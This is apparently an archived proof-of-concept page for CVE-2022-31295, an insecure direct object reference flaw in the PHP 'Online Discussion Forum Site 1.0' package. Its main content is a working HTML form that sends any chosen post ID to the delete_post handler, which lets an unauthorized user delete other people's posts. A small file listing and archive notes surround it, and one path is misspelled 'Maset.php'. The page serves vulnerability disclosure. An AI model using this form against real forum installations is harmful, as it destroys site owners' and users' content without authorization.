关联漏洞
Description
Online Discussion Forum Site 1.0 - IDOR / Delete any post
介绍
# CVE-2022-31295
Online Discussion Forum Site 1.0 - IDOR / Delete any post
#### Exploit Title: Online Discussion Forum Site 1.0 - IDOR / Delete any post
#### Date: 2022-06-13
#### CVE: CVE-2022-31295
#### Exploit Author: Abdulaziz Saad (@b4zb0z)
#### Vendor Homepage: https://www.sourcecodester.com/
#### Software Link: https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html
#### Version: 1.0
#### Tested on: LAMP, Ubuntu
-----
[#] Vulnerability Location:
`function delete_post()` in `/odfs/classes/Maset.php:133`
----
[#] Exploitation:
```
<form action="http://localhost/odfs/classes/Master.php?f=delete_post" method="post" id="manage-user">
<input type="text" name="id" value="" placeholder="enter POST ID to delete" required>
<button type="submit">Delete Post</button>
</form>
```
文件快照
[4.0K] /data/pocs/6911230fadbe8bab46bd6b00996a340237fa8d79
├── [ 300] deletePost.html
└── [ 862] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。